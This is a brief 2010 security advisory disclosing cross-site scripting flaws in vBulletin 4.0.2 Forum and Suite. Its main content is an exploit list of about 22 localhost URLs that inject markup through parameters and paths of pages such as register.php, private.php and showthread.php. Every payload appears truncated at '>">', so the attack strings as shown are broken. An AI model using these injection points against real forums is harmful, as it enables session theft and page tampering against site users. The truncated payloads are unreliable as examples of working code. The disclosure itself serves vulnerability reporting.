Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite

Veritas — Mon, 22 Feb 2010 18:20:05 +0000

Vendor: Internet Brands (NASDAQ: INET)
Product: vBulletin 4 Forum, vBulletin 4 Suite
Version: 4.0.2
Vector of Attack: Cross Site Scripting
Source: Inje3ct0r, vBulletin.com

Details:

# Exploit :

http://127.0.0.1/upload/calendar.php?acuparam=>”>

http://127.0.0.1/upload/faq.php?acuparam=>”>

http://127.0.0.1/upload/forum.php?acuparam=>”>

http://127.0.0.1/upload/usercp.php/>”>

http://127.0.0.1/upload/subscription.php?

acuparam=>”>

http://127.0.0.1/upload/showthread.php?acuparam=>”>

http://127.0.0.1/upload/showgroups.php/>”>

http://127.0.0.1/upload/sendmessage.php/>”>

http://127.0.0.1/upload/search.php/>”>

http://127.0.0.1/upload/register.php?acuparam=>”>

http://127.0.0.1/upload/profile.php?acuparam=>”>

http://127.0.0.1/upload/private.php?acuparam=>”>

http://127.0.0.1/upload/online.php/>”>

http://127.0.0.1/upload/newthread.php?acuparam=>”>

http://127.0.0.1/upload/misc.php/>”>

http://127.0.0.1/upload/memberlist.php?=>”‘>

http://127.0.0.1/upload/member.php/>”>

http://127.0.0.1/upload/inlinemod.php?acuparam=>”>

http://127.0.0.1/upload/index.php/>”>

http://127.0.0.1/upload/forumdisplay.php?acuparam=>”>

Additional vulnerabilities found by vBulletin Forum Members

http://127.0.0.1/upload/content.php/>”>

http://127.0.0.1/upload/blog.php/>”>

vBTruth » xss

Security Alert: Multiple XSS Vulnerabilities in Internet Brands’s vBulletin 4 Forum and vBulletin 4 Suite